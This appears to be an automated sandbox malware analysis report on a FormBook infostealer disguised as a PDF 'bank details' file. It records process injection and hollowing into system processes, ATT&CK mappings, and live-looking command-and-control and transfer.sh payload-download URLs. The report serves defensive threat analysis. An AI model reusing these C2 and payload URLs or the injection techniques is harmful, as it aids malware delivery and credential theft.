          Source: explorer.exe, 00000006.00000000.301271602.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.266854026.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.330020108.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.288652953.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000006.00000000.308410214.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.275598916.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeQueries volume information: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception812
          Process Injection          		1
          Masquerading          		OS Credential Dumping121
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)812
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common2
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items21
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 560342 Sample: BANK DETAILS-25012022-97133... Startdate: 26/01/2022 Architecture: WINDOWS Score: 100 34 www.brainymortgage.info 2->34 36 www.glenndcp.com 2->36 38 2 other IPs or domains 2->38 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 6 other signatures 2->62 11 BANK DETAILS-25012022-971332pdf.exe 14 3 2->11         started        signatures3 process4 dnsIp5 46 transfer.sh 144.76.136.153, 443, 49756, 49757 HETZNER-ASDE Germany 11->46 32 BANK DETAILS-25012022-971332pdf.exe.log, ASCII 11->32 dropped 72 Writes to foreign memory regions 11->72 74 Allocates memory in foreign processes 11->74 76 Injects a PE file into a foreign processes 11->76 16 aspnet_compiler.exe 11->16         started        file6 signatures7 process8 signatures9 48 Modifies the context of a thread in another process (thread injection) 16->48 50 Maps a DLL or memory area into another process 16->50 52 Sample uses process hollowing technique 16->52 54 2 other signatures 16->54 19 explorer.exe 16->19 injected process10 dnsIp11 40 www.janhenningsen.com 217.160.0.98, 49821, 80 ONEANDONE-ASBrauerstrasse48DE Germany 19->40 42 www.quanqiu55555.com 38.143.0.82, 49828, 80 GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHK United States 19->42 44 9 other IPs or domains 19->44 64 System process connects to network (likely due to code injection or exploit) 19->64 23 WWAHost.exe 19->23         started        26 autofmt.exe 19->26         started        signatures12 process13 signatures14 66 Modifies the context of a thread in another process (thread injection) 23->66 68 Maps a DLL or memory area into another process 23->68 70 Tries to detect virtualization through RDTSC time measurements 23->70 28 cmd.exe 1 23->28         started        process15 process16 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          BANK DETAILS-25012022-971332pdf.exe50%VirustotalBrowse
          BANK DETAILS-25012022-971332pdf.exe21%ReversingLabsByteCode-MSIL.Trojan.Strictor

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.aspnet_compiler.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.aspnet_compiler.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.quanqiu55555.com0%VirustotalBrowse
          vaughnediting.com4%VirustotalBrowse
          www.glenndcp.com0%VirustotalBrowse
          ghs.googlehosted.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.quanqiu55555.com/be4o/?M0Gdwp1p=yMGLhnybay5mZd/ZPFkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsijaPEOonxtzUinVLZQ==&xN9=9rHpFJex80%Avira URL Cloudsafe
          www.istemnetwork.com/be4o/100%Avira URL Cloudmalware
          http://www.vaughnediting.com/be4o/?M0Gdwp1p=o5nWsVakMWYc7w6fw0YZzD6T98nAnbLK/jyfa2gYanpMFXzyxGBpmDpbEk08JIgv5yuWiK9Rzg==&xN9=9rHpFJex8100%Avira URL Cloudmalware
          http://www.waktuk.com/be4o/?M0Gdwp1p=ZACv9Iyh0rPZy/9/g0wPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPV5sctPCm8P82V3qxg==&xN9=9rHpFJex8100%Avira URL Cloudmalware
          https://wearekamchatka.com//be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL0%Avira URL Cloudsafe
          http://www.avast.com0/0%URL Reputationsafe
          http://www.janhenningsen.com/be4o/?M0Gdwp1p=MXCJfAinsdUT0nhhknsrtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuF+1kPk8mbaZ3X+7FQ==&xN9=9rHpFJex80%Avira URL Cloudsafe
          http://www.kamchatka-agency.com/be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL+N7b95EvKIF+kbWJuwkW3uIXI2lc43g/pQXJxrFJYwWsw==&xN9=9rHpFJex80%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.quanqiu55555.com
          		38.143.0.82
          		truetrueunknown
          www.elektropanjur.com
          		209.99.40.222
          		truefalse
            		unknown
            vaughnediting.com
            		192.0.78.25
            		truetrueunknown
            parking.namesilo.com
            		209.141.38.71
            		truefalse
              		high
              transfer.sh
              		144.76.136.153
              		truefalse
                		high
                www.janhenningsen.com
                		217.160.0.98
                		truetrue
                  		unknown
                  www.glenndcp.com
                  		164.155.212.161
                  		truefalseunknown
                  ghs.googlehosted.com
                  		142.250.184.243
                  		truefalseunknown
                  waktuk.com
                  		95.179.246.125
                  		truetrue
                    		unknown
                    www.waktuk.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.piqqekqqbpjpajbzvvfqapwr.store
                      		unknown
                      		unknowntrue
                        		unknown
                        www.brainymortgage.info
                        		unknown
                        		unknowntrue
                          		unknown
                          www.kuanghong.club
                          		unknown
                          		unknowntrue
                            		unknown
                            www.istemnetwork.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.vaughnediting.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.kamchatka-agency.com
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.quanqiu55555.com/be4o/?M0Gdwp1p=yMGLhnybay5mZd/ZPFkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsijaPEOonxtzUinVLZQ==&xN9=9rHpFJex8true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  www.istemnetwork.com/be4o/true
                                  • Avira URL Cloud: malware
                                  		low
                                  http://www.vaughnediting.com/be4o/?M0Gdwp1p=o5nWsVakMWYc7w6fw0YZzD6T98nAnbLK/jyfa2gYanpMFXzyxGBpmDpbEk08JIgv5yuWiK9Rzg==&xN9=9rHpFJex8true
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.waktuk.com/be4o/?M0Gdwp1p=ZACv9Iyh0rPZy/9/g0wPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPV5sctPCm8P82V3qxg==&xN9=9rHpFJex8true
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://transfer.sh/get/AeJsG7/RAM.txtfalse
                                    		high
                                    https://transfer.sh/get/y4hP6y/DLLLLLLLL.txtfalse
                                      		high
                                      http://www.janhenningsen.com/be4o/?M0Gdwp1p=MXCJfAinsdUT0nhhknsrtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuF+1kPk8mbaZ3X+7FQ==&xN9=9rHpFJex8true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.kamchatka-agency.com/be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL+N7b95EvKIF+kbWJuwkW3uIXI2lc43g/pQXJxrFJYwWsw==&xN9=9rHpFJex8false
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000000.305526552.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.272013466.0000000006840000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://transfer.sh/get/y4hP6y/DLLLLLLLL.txt;VXCSGDFD.Properties.ResourcesBANK DETAILS-25012022-971332pdf.exefalse
                                          		high
                                          https://wearekamchatka.com//be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iLWWAHost.exe, 00000010.00000002.518731229.0000000003DA2000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://transfer.sh/get/y4hP6y/DLLLLLLLL.txtxBANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263280018.000000000309B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://transfer.shBANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263142353.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.avast.com0/BANK DETAILS-25012022-971332pdf.exefalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263142353.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                38.143.0.82
                                                		www.quanqiu55555.comUnited States
                                                		134520GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHKtrue
                                                144.76.136.153
                                                		transfer.shGermany
                                                		24940HETZNER-ASDEfalse
                                                192.0.78.25
                                                		vaughnediting.comUnited States
                                                		2635AUTOMATTICUStrue
                                                217.160.0.98
                                                		www.janhenningsen.comGermany
                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                142.250.184.243
                                                		ghs.googlehosted.comUnited States
                                                		15169GOOGLEUSfalse
                                                95.179.246.125
                                                		waktuk.comNetherlands
                                                		20473AS-CHOOPAUStrue

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:560342
                                                Start date:26.01.2022
                                                Start time:11:56:43
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 24s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:BANK DETAILS-25012022-971332pdf.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:28
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@8/1@14/6
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 55.7% (good quality ratio 50.8%)
                                                • Quality average: 72.9%
                                                • Quality standard deviation: 31.3%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 73
                                                • Number of non-executed functions: 122
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                11:57:48API Interceptor1x Sleep call for process: BANK DETAILS-25012022-971332pdf.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                144.76.136.153OZ5XkYPXcG.exeGet hashmaliciousBrowse
                                                • transfer.sh/get/XN16WS/Psminaz.png
                                                ORDER 211011A.xlsmGet hashmaliciousBrowse
                                                • transfer.sh/get/HyKymv/wordart.exe
                                                ORDER 211011A.xlsmGet hashmaliciousBrowse
                                                • transfer.sh/get/HyKymv/wordart.exe
                                                7D7J29AK4L60S.vbsGet hashmaliciousBrowse
                                                • transfer.sh/dS6EmG/gfyhjrr.txt
                                                Invoice_9652170.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/TKvxUI/Aunty.txt
                                                PO 11029.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/a6DUG4/Server.txt
                                                Invoice 223.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/Bu2lYU/Server.txt
                                                Invoices #141.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/iLSvYs/bypass.txt
                                                Receipt_12203.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/E2oQCW/Server.txt
                                                Invoice #60122.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/Vp6k0P/Server.txt
                                                M00GS82.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/QipjYs/fOOFFK.txt
                                                #P0082.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/4YgL52/HJN.txt
                                                Invoice #33190.vbsGet hashmaliciousBrowse
                                                • transfer.sh/get/1jDQCmj/trivago.txt
                                                ZHDJFEB83MK.vbsGet hashmaliciousBrowse
                                                • transfer.sh/15cCRXY/KFKFKF.txt
                                                #W002.vbsGet hashmaliciousBrowse
                                                • transfer.sh/1YKpmfw/HmS.txt
                                                WOO62_InvoiceCopy.vbsGet hashmaliciousBrowse
                                                • transfer.sh/p/SHJA.txt
                                                A719830-Paid-Receipt.vbsGet hashmaliciousBrowse
                                                • transfer.sh/b/deef.txt
                                                S0187365-Paid-Receipt.vbsGet hashmaliciousBrowse
                                                • transfer.sh/1w231Gc/eeff.txt
                                                X92867354_PAYMENT_RECEIPT.vbsGet hashmaliciousBrowse
                                                • transfer.sh/1cKLmWw/defff.txt
                                                H6289_Payment_Invoice_.vbsGet hashmaliciousBrowse
                                                • transfer.sh/bypass.txt

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                parking.namesilo.comnideGet hashmaliciousBrowse
                                                • 70.39.125.244
                                                WfBrDXXf6y.exeGet hashmaliciousBrowse
                                                • 107.161.23.204
                                                r#U00e1pida confirmaci#U00f3n.exeGet hashmaliciousBrowse
                                                • 64.32.22.102
                                                q9VO0ItTRSrphpi.exeGet hashmaliciousBrowse
                                                • 45.58.190.82
                                                E-Invoice No 11073490.eml.exeGet hashmaliciousBrowse
                                                • 64.32.22.102
                                                DHL_AWB_NO#90785388091100.exeGet hashmaliciousBrowse
                                                • 209.141.38.71
                                                SO211208110027.xls.exeGet hashmaliciousBrowse
                                                • 70.39.125.244
                                                V8jPNztks1.exeGet hashmaliciousBrowse
                                                • 198.251.81.30
                                                eIuX1M9UsN.exeGet hashmaliciousBrowse
                                                • 45.58.190.82
                                                9nM1eSsQgX.exeGet hashmaliciousBrowse
                                                • 168.235.88.209
                                                SNaFNM1877.exeGet hashmaliciousBrowse
                                                • 198.251.81.30
                                                ZDSWrJbftX.exeGet hashmaliciousBrowse
                                                • 45.58.190.82
                                                al#U0131nt#U0131 yapmak.exeGet hashmaliciousBrowse
                                                • 204.188.203.155
                                                PO 02D12M2021Y.exeGet hashmaliciousBrowse
                                                • 70.39.125.244
                                                DZqb1YCMJknskFE.exeGet hashmaliciousBrowse
                                                • 45.58.190.82
                                                ftgSUfxxkX.exeGet hashmaliciousBrowse
                                                • 198.251.81.30
                                                DO 2168569 2172145000025112021.exeGet hashmaliciousBrowse
                                                • 64.32.22.102
                                                Payment Swift 101,647.09.exeGet hashmaliciousBrowse
                                                • 198.251.84.92
                                                Shipment_21HT42223.exeGet hashmaliciousBrowse
                                                • 192.161.187.200
                                                Purchase Order 2890.exeGet hashmaliciousBrowse
                                                • 198.251.84.92
                                                transfer.shPurchase Order 25.01.2022.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                BANK SLIP.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                BANK INFORMATION-M0025012022-971332pdf.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                DHL_Jan 2022 at 1.20_8BZ2290_JPG.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                FedEx Package.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                SecuriteInfo.com.MSIL.TrojanDownloader.Agent.KBO.23714.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                OZ5XkYPXcG.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                SKM-210221.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                lK2NItAmQC.xllGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                IMG_212022100120011.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                MV SHENGSHI TBN - Vessel's Particulars.docx.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                DHL_Jan 2022 at 1.40_80BZ290_JPG.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                SKM_20012022.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                Bank Payment Report.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                DHL_Jan 2022 at 1.10_80BZ290_JPG.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                BBVVCCVVB.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                Payment Advice.gz.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                BbJ7JcAmPC.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                O0UY1OOM0Z.exeGet hashmaliciousBrowse
                                                • 144.76.136.153
                                                p5N7g8h6l5.exeGet hashmaliciousBrowse
                                                • 144.76.136.153

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                HETZNER-ASDEiflcHfU5tb.exeGet hashmaliciousBrowse
                                                • 148.251.234.83
                                                NK51NysX9W.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                zJQL5lh03j.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                XrZWTziQn7.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                3P4AG8vBfZ.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                cksX5l4AD3.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                nptKHctFER.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                NK51NysX9W.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                zJQL5lh03j.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                XrZWTziQn7.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                3P4AG8vBfZ.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                cksX5l4AD3.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                AhkJNXSxbP.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                1DO5h8MS2S.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                a02zX9Vxio.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                AhkJNXSxbP.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                Mo1h0Xy13i.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                1DO5h8MS2S.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                a02zX9Vxio.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                8eAYsVkb45x.dllGet hashmaliciousBrowse
                                                • 78.47.204.80
                                                AUTOMATTICUSaaaaaaaa.xlsxGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                70E50DE48C85C25259CF5247205792B0EB339CA700867.exeGet hashmaliciousBrowse
                                                • 74.114.154.22
                                                Inquiry2226.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                07C18E8E0F92E75367DF02C4114947B038E86FCBC7C8E.exeGet hashmaliciousBrowse
                                                • 74.114.154.18
                                                cYR4H9IheuGet hashmaliciousBrowse
                                                • 192.0.70.89
                                                Payment Slip-pdf-scan-copy.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                ODFkNglL18.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                Order-711493-pdf.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                SKGHCCMAidbki_pri.xlsxGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                Payment Details_$98,000.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exeGet hashmaliciousBrowse
                                                • 74.114.154.18
                                                FpgQY4ZKc4.docxGet hashmaliciousBrowse
                                                • 192.0.76.3
                                                FpgQY4ZKc4.docxGet hashmaliciousBrowse
                                                • 192.0.76.3
                                                TRANSF67891.exeGet hashmaliciousBrowse
                                                • 192.0.78.137
                                                DdsS12pTee.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                wnH1dgz0VY.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                01112022-MYTEL.xlsxGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                BL COPY- CIF LCL SEA SHIPMENT.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                vbc.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                Quotation Request.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHKBL_CI_PL.exeGet hashmaliciousBrowse
                                                • 38.143.25.232
                                                nMM5RrDp4m.exeGet hashmaliciousBrowse
                                                • 38.143.0.84
